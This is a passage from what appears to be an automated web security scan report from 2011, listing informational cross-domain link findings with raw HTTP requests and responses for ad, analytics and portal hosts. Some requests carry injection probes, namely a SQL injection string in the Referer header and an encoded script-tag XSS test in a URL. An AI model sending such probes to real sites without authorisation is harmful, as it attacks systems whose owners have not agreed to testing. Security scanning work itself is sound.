Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 448
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 15:14:42 GMT
Expires: Sun, 30 Jan 2011 15:14:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/0/0/%2a/m;203131985;0-0;0;27095315;27966-977/40;37635588/37653466/2;;~sscs=%3fhttp://www.facebook.com/TigerDirect"><img src="http://s0.2mdn.net/viewad/1308101/FB_977x40-fblike.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.28. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2465.SD137929N2465SN0/B4809700.27

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1104996/5-88x31.gif

Request

GET /adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 17:16:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 518

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/14/c5/%2a/e;232804175;0-0;0;56866311;21-88/31;38302341/38320098/1;;~sscs=%3fhttp://oasc03049.popsci.com/RealMedia/ads
...[SNIP]...
i.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?http://www.autozone.com/autozone/storelocator/storeLocatorMain.jsp"><img src="http://s0.2mdn.net/viewad/1104996/5-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.29. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2465.SD137929N2465SN0/B4809700.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1104996/5-88x31.gif

Request

GET /adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 17:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/14/c7/%2a/r;232804175;0-0;0;56682324;21-88/31;38302341/38320098/1;;~sscs=%3fhttp://oasc03049.popsci.com/RealMedia/ads
...[SNIP]...
com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?http://www.autozone.com/autozone/storelocator/storeLocatorMain.jsp"><img src="http://s0.2mdn.net/viewad/1104996/5-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/1384245/300x60+MSN+Slider+Banner.gif
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=9903600230&utm_medium=banner&utm_campaign=nyp

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 569

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=9903600230&utm_medium=banner&utm_campaign=nyp"><img src="http://s0.2mdn.net/viewad/1384245/300x60+MSN+Slider+Banner.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.31. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1

The response contains the following link to another domain:

http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296351557

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:39:17 GMT; path=/
Set-Cookie: i_34=8:45:27:7:0:34115:1296351557:B2|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:39:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2445

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_27" align="middle">');
       document.write('<param name="salign
...[SNIP]...
</object>');
       document.close();
   }
   wsod_flash();
               document.write('<img src="http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296351557" width = "1" height = "1" border = "0">');

22.32. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1

The response contains the following link to another domain:

http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296408337

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:25:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:25:37 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:34115:1296408337:B2|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 17:25:37 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...
</object>');
       document.close();
   }
   wsod_flash();
               document.write('<img src="http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296408337" width = "1" height = "1" border = "0">');

22.33. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1

The response contains the following link to another domain:

http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296350886

Request

Response

22.34. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/pixel?id=1051114&t=1

The response contains the following link to another domain:

http://www.googleadservices.com/pagead/conversion/1037875620/?label=nOCpCPKW9QEQpPPy7gM&guid=ON&script=0

Request

Response

22.35. http://add.my.yahoo.com/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/rss

Issue detail

The page was loaded from a URL containing a query string:

http://add.my.yahoo.com/rss?url=

The response contains the following link to another domain:

http://l.yimg.com/a/i/yahoo.gif

Request

GET /rss?url= HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:05:18 GMT
Set-Cookie: B=2aojljp6k9hqu&b=3&s=ch; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...
<a href="http://us.rd.yahoo.com/404/*http://www.yahoo.com"><img
src=http://l.yimg.com/a/i/yahoo.gif
width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

22.36. http://ads.asp.net/a.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.asp.net
Path:	/a.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords=

The response contains the following link to another domain:

http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC

Request

Response

22.37. http://ads.neudesicmediagroup.com/a.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.neudesicmediagroup.com
Path:	/a.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords=

The response contains the following link to another domain:

http://www.componentone.com/SuperProducts/StudioEnterprise/Charts/?utm_source=neudesic%2Bron&utm_medium=banner&utm_content=charts%2B728x90&utm_campaign=2010v3

Request

GET /a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords= HTTP/1.1
Host: ads.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 287
Content-Type: text/html; charset=utf-8
Location: http://www.componentone.com/SuperProducts/StudioEnterprise/Charts/?utm_source=neudesic%2Bron&utm_medium=banner&utm_content=charts%2B728x90&utm_campaign=2010v3
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
Set-Cookie: %24CC=US; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
Set-Cookie: %24RC=TX; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
Set-Cookie: %24MC=0; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:03 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.componentone.com/SuperProducts/StudioEnterprise/Charts/?utm_source=neudesic%2Bron&utm_medium=banner&utm_content=charts%2B728x90&utm_campaign=2010v3">here</a>
...[SNIP]...

22.38. http://analytics.live.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.live.com
Path:	/Sync.html

Issue detail

The page was loaded from a URL containing a query string:

http://analytics.live.com/Sync.html?V=3525&AQNT=1

The response contains the following links to other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.redacted/Include.html

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.live.com
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:a04"
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; wlidperf=throughput=5&latency=610

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:5c8"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
...[SNIP]...
</script>
<iframe id="_msnFrame" src="//analytics.redacted/Include.html" style="z-index:-1;height:1px;width:1px;display:none;visibility:hidden;"></iframe>
...[SNIP]...

22.39. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The page was loaded from a URL containing a query string:

http://assets.tumblr.com/iframe.html?8&src=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual&pid=3007820135&rk=GHuYv0bI&lang=en_US&name=informationarbitrage

The response contains the following link to another domain:

http://www.google-analytics.com/ga.js

Request

GET /iframe.html?8&src=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual&pid=3007820135&rk=GHuYv0bI&lang=en_US&name=informationarbitrage HTTP/1.1
Host: assets.tumblr.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 14:47:56 GMT
ETag: "e0002-e18-49039beb65a80+gzip"
Last-Modified: Tue, 14 Sep 2010 15:19:54 GMT
Server: ECS (dca/532D)
Vary: Accept-Encoding
X-Cache: HIT
X-Tumblr-Usec: D=446
Content-Length: 3608

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

    <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.40. http://astrocenter.astrology.redacted/msn/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://astrocenter.astrology.redacted
Path:	/msn/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://astrocenter.astrology.redacted/msn/Default.aspx?When=0&Af=-1000&VS&Af=-1000

The response contains the following links to other domains:

http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js
http://download.live.com/?sku=messenger
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://go.microsoft.com/fwlink/?LinkId=74170
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video
http://msn.whitepages.com/
http://msnportalastrology.112.2o7.net/b/ss/msnportalastrology/1/H.1--NS/0
http://privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png
http://privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s
http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000
http://video.msnbc.com/
http://www.adobe.com/
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000
http://www.astrocenter.com/us/PrivacyPopup.aspx
http://www.astrocenter.com/us/center.ico
http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg
http://www.astrocenter.com/us/images/PE.png
http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png
http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDGT_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdMT_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png
http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png
http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png
http://www.astrocenter.com/us/images/info.gif
http://www.astrocenter.com/us/images/spacer.gif
http://www.astrocenter.com/us/js/center-horoscope.js
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?FORM=A1&q=summer+sandals+2010&src=IE-SearchBox
http://www.bing.com/search?FORM=A18
http://www.bing.com/search?form=A18
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.horoscope.com/
http://www.myhomeredacted/
http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000
http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /msn/Default.aspx?When=0&Af=-1000&VS&Af=-1000 HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92574
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:42:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
<meta name="robots" CONTENT="index,follow,all">
<link rel="shortcut icon" href="http://www.astrocenter.com/us/center.ico">
<meta http-equiv="PICS-Label" content='(pics-1.0 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "Microsoft Network" on "1996.04.16T08:15-0500" r (n 0 s 0 v 0 l 0))'>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...
</div>
           <img src="http://www.astrocenter.com/us/images/PE.png" align="center"><br>
...[SNIP]...
<li><a href="http://video.msnbc.com/">Video</a>
...[SNIP]...
<li class="c3">
                                   <a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
